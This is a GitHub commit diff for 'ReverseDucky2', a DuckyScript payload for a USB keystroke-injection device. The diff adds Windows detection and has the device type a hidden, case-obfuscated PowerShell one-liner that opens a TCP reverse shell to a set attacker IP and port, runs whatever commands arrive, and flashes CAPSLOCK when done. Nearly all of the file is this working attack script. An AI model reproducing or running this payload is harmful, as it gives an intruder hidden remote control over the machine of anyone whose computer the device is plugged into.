Updated ReverseDucky2 to version 2

- Added DuckyScript 3.0 usage
- Inserting into non Windows machines, the Ducky won't execute the payload and will appear broken
pull/183/head
0iphor13 2022-11-24 17:34:20 +01:00 committed by GitHub
parent 5294cc938b
commit 630392c69d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 64 additions and 19 deletions

View File

@ -1,27 +1,72 @@
REM ReverseDucky2
REM Version 1.3
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM ReverseDuckyII
REM Version 2.0
REM OS: Windows / Multi
REM Author: 0iphor13
REM Requirement: DuckyScript 3.0
REM Reverse shell executed in the background
REM Fill in Attacker-IP and Port in Line 19
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
REM If inserted into a non Windows machine, the Ducky will appear broken.
REM DON'T FORGET TO START LISTENER
REM PASSIVE_WINDOWS_DETECT extension, made by Korben, to indentify the OS
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.0
REM Windows fully passive OS Detection and passive Detect Ready
REM Includes its own passive detect ready. Does not require
REM additional extensions
REM USAGE:
REM Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay
REM $_OS will be set to WINDOWS or NOT_WINDOWS
REM CONFIGURATION:
DEFINE MAX_WAIT 150
DEFINE CHECK_INTERVAL 20
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
DEFINE NOT_WINDOWS 7
VAR $MAX_TRIES = MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
ELSE
$_OS = NOT_WINDOWS
END_IF
REM EXAMPLE USAGE AFTER EXTENSION
REM IF ($_OS == WINDOWS) THEN
REM STRING HELLO WINDOWS!
REM ELSE
REM STRING HELLO WORLD!
REM END_IF
END_EXTENSION
REM Configure your settings below:
REM Insert the attacking IP between '' & define your port
DEFINE ATTACKER '192.168.178.25'
DEFINE PORT 4444
REM Set the default DELAY
DEFINE WAIT 500
IF ($_OS == WINDOWS) THEN
DELAY 1500
GUI r
DELAY 500
STRING powershell -NoP -NonI -W hidden
DELAY 250
ENTER
DELAY 200
STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("ATTACKER-IP",PORT);$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s
DELAY 100
STRING .REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt
DELAY 100
STRING -STriNG);$x=$z+"PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE()
DELAY 100
ENTER
DELAY WAIT
STRINGLN powershell -NoP -NonI -w h
DELAY WAIT
STRINGLN $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt( ATTACKER , PORT );$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt-STriNG);$x=$z+"Ducky@PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE();exit
REM Capslock light will indicate a finished payload
CAPSLOCK
ELSE
DELAY WAIT
REM Inserting the Ducky into a non Windows machine will result in ATTACKMODE OFF
ATTACKMODE OFF
END_IF